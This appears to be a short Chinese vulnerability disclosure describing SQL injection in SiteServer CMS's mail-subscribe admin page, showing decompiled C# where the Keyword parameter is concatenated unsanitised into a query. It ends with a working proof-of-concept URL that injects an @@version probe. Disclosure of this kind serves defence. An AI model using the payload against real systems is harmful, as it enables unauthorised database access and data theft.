注入存在/siteserver/cms/background_mailSubscribe.aspx
用.NET Reflector 反编译SiteServer.CMS.dll这个文件
查看代码如下:
```
if (((((uint) isPostBack) - ((uint) isPostBack)) >= 0) && isPostBack)
{
this.spContents.SelectCommand = DataProvider.MailSubscribeDAO.GetSelectCommend(base.PublishmentSystemID, base.Request.QueryString["Keyword"], base.Request.QueryString["DateFrom"], base.Request.QueryString["DateTo"]);
}
else
```
Keyword
```
public string GetSelectCommend(int publishmentSystemID, string keyword, string dateFrom, string dateTo)
{
// This item is obfuscated and can not be translated.
StringBuilder builder;
bool flag;
bool flag2;
if (publishmentSystemID != 0)
{
goto Label_02D7;
}
if ((((uint) publishmentSystemID) + ((uint) publishmentSystemID)) >= 0)
{
goto Label_0311;
}
goto Label_026E;
Label_002D:
return ("SELECT ID, PublishmentSystemID, Receiver, Mail, IPAddress, AddDate FROM siteserver_MailSubscribe " + builder.ToString());
Label_0069:
builder.AppendFormat("(AddDate <= '{0}')", dateTo);
goto Label_002D;
.....
Label_0197:
if ((((uint) flag2) + ((uint) flag)) <= uint.MaxValue)
{
goto Label_016C;
}
goto Label_0151;
Label_01B4:
if ((((uint) flag) & 0) != 0)
{
goto Label_02B6;
}
builder.AppendFormat("(Receiver LIKE '%{0}%' OR Mail LIKE '%{0}%')", keyword);
goto Label_0197;
```
漏洞证明
```
http://www.target.com/siteserver/cms/background_mailSubscribe.aspx?PublishmentSystemID=0&Keyword='%20and%201=@@version%20and%201='1&DateFrom=&DateTo=
```
have 3 exchange
京公网安备 11010502034610号
Unavailable Comments